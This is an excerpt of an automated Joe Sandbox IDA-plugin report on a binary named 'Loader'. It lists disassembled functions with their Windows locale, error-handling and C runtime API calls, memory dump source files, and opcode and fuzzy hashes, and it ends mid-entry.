                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED0654
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 3736152602-0
                                                                                        • Opcode ID: b61e3995da0f6a2a870f5f7f17ef57a433af0bce54cb1308441af4976bf56afb
                                                                                        • Instruction ID: e2895047b10c23705cd8d7dfee49fb6ce2a073116208c2e4a9e567f937ba3b34
                                                                                        • Opcode Fuzzy Hash: b61e3995da0f6a2a870f5f7f17ef57a433af0bce54cb1308441af4976bf56afb
                                                                                        • Instruction Fuzzy Hash: A921D372601206ABDB289B15DD42FBA73E8EF84314F18107EFD11E6641EB75DD128B54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        • Opcode ID: f895735ce8c31b6f3cecf8524a5471a1ff31125fe61762b44ebbdf9ad6e75e47
                                                                                        • Instruction ID: f9b20d806dfd8ecdb9910206770cf87381cad0db78c530ade0599481c73b9547
                                                                                        • Opcode Fuzzy Hash: f895735ce8c31b6f3cecf8524a5471a1ff31125fe61762b44ebbdf9ad6e75e47
                                                                                        • Instruction Fuzzy Hash: 0BB1C03090060B8BCB28DE68C755FBEBBB1AB14318F14261DEA52B7691C7379E43DB51
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • EnumSystemLocalesW.KERNEL32(00ED034E,00000001,00000000,?,-00000050,?,00ED013E,00000000,-00000002,00000000,?,00000055,?), ref: 00ED0325
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2417226690-0
                                                                                        • Opcode ID: a1e852ddc8e12c1745e6965d104b362e70264555a204051beb662e4af6a04c0d
                                                                                        • Instruction ID: c3fd8af697ee19d080e5b35e009c8c308d0921ae917971eb9799b2a160b9b7ec
                                                                                        • Opcode Fuzzy Hash: a1e852ddc8e12c1745e6965d104b362e70264555a204051beb662e4af6a04c0d
                                                                                        • Instruction Fuzzy Hash: 8111E9366047059FDB189F39D89177AB791FF84368F18442EE54697B41D371A943CB40
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED0774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 3736152602-0
                                                                                        • Opcode ID: 4b21e3273cc5343afd530245b4a22da27e217c5ccbe30ca9326d04a95f2302b6
                                                                                        • Instruction ID: 6ac942492ae2386fb772ea00857fbc34a28cec11d7db945b406d54a9e78f8c89
                                                                                        • Opcode Fuzzy Hash: 4b21e3273cc5343afd530245b4a22da27e217c5ccbe30ca9326d04a95f2302b6
                                                                                        • Instruction Fuzzy Hash: F511E372600106ABD714EB28DD42AAA77ECEF04314F14117BF505EB341EB74ED058B90
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00ED056A,00000000,00000000,?), ref: 00ED08F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 3736152602-0
                                                                                        • Opcode ID: a7180bd506aa70b9005db8c5e6b54c2443802d818f3e157c042bb276c0575c9b
                                                                                        • Instruction ID: 9f20066f4d53fbbfcc6e71ac3bd47b0afd0d3d670538c0309b000d6a2b0289e6
                                                                                        • Opcode Fuzzy Hash: a7180bd506aa70b9005db8c5e6b54c2443802d818f3e157c042bb276c0575c9b
                                                                                        • Instruction Fuzzy Hash: 5701DB32610116BFEB2856258815BBA7754DBC0358F19542EEC46B3281EA70EE43CAD0
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • EnumSystemLocalesW.KERNEL32(00ED0600,00000001,?,?,-00000050,?,00ED0106,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00ED05EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2417226690-0
                                                                                        • Opcode ID: 484b7a035d126b4a1d92361eb7c4e0b6cdb0bc77bffa5a964a3d45c9ded52201
                                                                                        • Instruction ID: 681852dd2e4d529ae69d9a2d8653d9ddf9b037ab4cfb3e0208d6871fb9dbd611
                                                                                        • Opcode Fuzzy Hash: 484b7a035d126b4a1d92361eb7c4e0b6cdb0bc77bffa5a964a3d45c9ded52201
                                                                                        • Instruction Fuzzy Hash: 2FF0C2362003045FEB245F39A881B6A7B91EB80368F09442EF9465BB80D6B1AC038A50
                                                                                        APIs
                                                                                          • Part of subcall function 00EC7594: EnterCriticalSection.KERNEL32(?,?,00ECB440,?,00EE5B00,00000008,00ECB332,?,?,?), ref: 00EC75A3
                                                                                        • EnumSystemLocalesW.KERNEL32(00ECBFE3,00000001,00EE5B80,0000000C,00ECB948,-00000050), ref: 00ECC028
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1272433827-0
                                                                                        • Opcode ID: e1f2340839a3314596da290b2c6df1fd7b2da69d764c7d2c72b44ba56fa088d2
                                                                                        • Instruction ID: 279b2057fed1317c1f09acc7d69261fd1b394b4c6581bb84aeda690b16615133
                                                                                        • Opcode Fuzzy Hash: e1f2340839a3314596da290b2c6df1fd7b2da69d764c7d2c72b44ba56fa088d2
                                                                                        • Instruction Fuzzy Hash: AEF03772A40348DFDB00EF99E942B9E7BE0EB08725F10516AF515AB3A0DB7649058F50
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • EnumSystemLocalesW.KERNEL32(00ED0720,00000001,?,?,?,00ED0160,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00ED070C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2417226690-0
                                                                                        • Opcode ID: edb0d0f85dabc39ee739ce68ded85e6201c4604284bd183c108bd83c66e8abe2
                                                                                        • Instruction ID: a53a4fdc2eb9f04a4a291b4145779f39fc3c090348abb760f0e9d66cc4643fc2
                                                                                        • Opcode Fuzzy Hash: edb0d0f85dabc39ee739ce68ded85e6201c4604284bd183c108bd83c66e8abe2
                                                                                        • Instruction Fuzzy Hash: 68F0273930024857CB14AB35D94576A7B90EBC1714F0A405AFA059B680C2719843CB90
                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00EC62F0,?,20001004,00000000,00000002,?,?,00EC5202), ref: 00ECBA80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 1567f1eccfd4ef886b33887827b1ba2b33f900c8b29ee218957e102e620975a3
                                                                                        • Instruction ID: b55880f99469faa4c9a43a87d4afaae8fd1b66aa64376b792c28094d65c3b4b5
                                                                                        • Opcode Fuzzy Hash: 1567f1eccfd4ef886b33887827b1ba2b33f900c8b29ee218957e102e620975a3
                                                                                        • Instruction Fuzzy Hash: 49E01A3190426DBBCB126F62DD06FAE3B65EB44B61F015019F916791609B328D22AA94
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000E541), ref: 00EBE425
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 032dd30d915314bbc510a533bcbbb01dfb93b525cfdb1ffda1e480d124f867f1
                                                                                        • Instruction ID: 8c6ac31a529944a70bbd1b203d0f06497658aa0d8d8c5bc7e665cb09277f6a6c
                                                                                        • Opcode Fuzzy Hash: 032dd30d915314bbc510a533bcbbb01dfb93b525cfdb1ffda1e480d124f867f1
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 0a18e2cbe7ba1df6d9c66f60b26b4942c34f94b353a08fc3ceea274eb989f680
                                                                                        • Instruction ID: 41c338b3f8cfbc949239c75dbbb14c748f7f56681c45285f5211a3fb522d81d5
                                                                                        • Opcode Fuzzy Hash: 0a18e2cbe7ba1df6d9c66f60b26b4942c34f94b353a08fc3ceea274eb989f680
                                                                                        • Instruction Fuzzy Hash: E8A011B02002888F83008F33AB882083BE8AB00AE8308882AB00CE80A0FA2080088F00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 575a65f46a6968a851d95f4fbb3b08d64d78846f706d08c464dbb8cdd4e640a5
                                                                                        • Instruction ID: 053cc40399908cd3af7f57e7194241caf5ba3193e0b9b54fda9fb29f1cd93430
                                                                                        • Opcode Fuzzy Hash: 575a65f46a6968a851d95f4fbb3b08d64d78846f706d08c464dbb8cdd4e640a5
                                                                                        • Instruction Fuzzy Hash: 4B517AB0D1120D9FCB40DFA8D5A19EEBBF4AB09360F6454AAE815FB310D734AA41CB65
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5b09bf12e5c2e8d7582d564a84ecff0233d655a9ca007892ea5b4b72774f514
                                                                                        • Instruction ID: e1c8a8a4c9ccfe527baa462823e2862883390426e6429de92dd0015c17f0e831
                                                                                        • Opcode Fuzzy Hash: e5b09bf12e5c2e8d7582d564a84ecff0233d655a9ca007892ea5b4b72774f514
                                                                                        • Instruction Fuzzy Hash: 6AD06C3A645A58AFC210CF4AE840D41F7A8FB8D670B158066EA58A7B20C231F815CFE0
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(00734FB8,00734FB8,00000000,7FFFFFFF,?,00EDA19D,00734FB8,00734FB8,00000000,00734FB8,?,?,?,?,00734FB8,00000000), ref: 00EDA258
                                                                                        • __alloca_probe_16.LIBCMT ref: 00EDA313
                                                                                        • __alloca_probe_16.LIBCMT ref: 00EDA3A2
                                                                                        • __freea.LIBCMT ref: 00EDA3ED
                                                                                        • __freea.LIBCMT ref: 00EDA3F3
                                                                                        • __freea.LIBCMT ref: 00EDA429
                                                                                        • __freea.LIBCMT ref: 00EDA42F
                                                                                        • __freea.LIBCMT ref: 00EDA43F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                        • String ID:
                                                                                        • API String ID: 127012223-0
                                                                                        • Opcode ID: d80035976388243f9adecc96ce9ad0dcc02af696c496e62b06d6d8ea83d2b25d
                                                                                        • Instruction ID: c3a09560e5dd205b0bb28ccba162ac92b88e60e6f3c27bd95b2709011bd9b2ce
                                                                                        • Opcode Fuzzy Hash: d80035976388243f9adecc96ce9ad0dcc02af696c496e62b06d6d8ea83d2b25d
                                                                                        • Instruction Fuzzy Hash: 837125729002495BDF219F548C81BEF77EAEF49318F1C243AE814B7391E7769E028752
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3213747228-0
                                                                                        • Opcode ID: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                        • Instruction ID: dfe99e928fffa7ce087e72066855be0913542b5df3b53f7f1dcc7a54e565ff07
                                                                                        • Opcode Fuzzy Hash: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                        • Instruction Fuzzy Hash: 84B14472E083959FDB118F28CD81FEEBBA5EB55310F14516EE845BF282D2739902C7A0
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF827
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00EBF82F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF8B8
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00EBF8E3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EBF938
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 505a1e4b7d335f3154b5a5b228ef19f1793563a5c408d61a146dcc7cbdc3b3ee
                                                                                        • Instruction ID: e7874163bac0d25dec843023d3e434a225053bf553999dfc1383cdef4f826a85
